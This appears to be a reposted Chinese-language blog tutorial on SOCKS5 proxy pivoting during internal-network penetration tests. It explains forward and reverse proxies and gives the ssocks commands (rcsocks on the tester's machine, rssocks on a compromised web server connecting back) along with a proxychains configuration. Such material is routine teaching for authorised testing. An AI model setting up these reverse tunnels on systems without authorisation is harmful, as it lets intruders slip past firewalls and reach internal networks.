內網滲透之socks5代理總結


內網socks5代理我總結了一下,一共分linux和windows兩種方式,其實除了用到的工具不一樣,一個圖形工具,一個命令行,其他大同小異

在總結代理之前還是再梳理一下正向代理和反向代理的區別

1.1 正向代理(Forward Proxy)

Lhost--》proxy--》Rhost 

Lhost為了訪問到Rhost,向proxy發送了一個請求並且指定目標是Rhost,然后proxy向Rhost轉交請求並將獲得的內容返回給Lhost,簡單來說正向代理就是proxy代替了我們去訪問Rhost。

1.2 反向代理(reverse proxy)

Lhost<--->proxy<--->firewall<--->Rhost 

和正向代理相反(廢話),Lhost只向proxy發送普通的請求,具體讓他轉到哪里,proxy自己判斷,然后將返回的數據遞交回來,這樣的好處就是在某些防火牆只允許proxy數據進出的時候可以有效的進行穿透

1.3 簡單區分

正向代理是我們自己(Lhost)主動(proxy)進攻,反向代理是她(Rhost)主動通過 (proxy)找我(Lhost)

 

windows環境下:---reGeorg+proxifier 正向代理

 

linux環境下:   ---socks代理

在http://sourceforge.net/projects/ssocks/  下載對應的linux安裝包

然后安裝完成

1)本地監聽端口
在滲透測試端執行

./rcsocks -l 1088 -p 1080 -vv

等待遠程Socks5服務器訪問本地1080端口,創建端口1080與本地端口1088的連接通道

 

2)開啟Socks5代理服務,反彈
在web服務器上執行

./rssocks -vv -s 滲透測試機ip:1080

啟用Socks5服務,反彈到滲透測試機的端口1080上

 3)利用proxychains進行Socks5代理

proxychains是一個代理客戶端軟件,可以支持幾乎所有程序的代理,如ssh,telnet,ftp等。利用proxychains,程序能在代理的環境下被加載運行,而本身不需要具備代理功能。使用前需要對proxychains進行簡單配置,打開配置文件proxychains.conf(在Kali位於/etc/proxychains.conf),在末尾[ProxyList]處添加
socks5 127.0.0.1 1088

 配置成功后若要啟動程序,僅需要在啟動程序命令前加上proxychains即可通過代理訪問內網服務。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM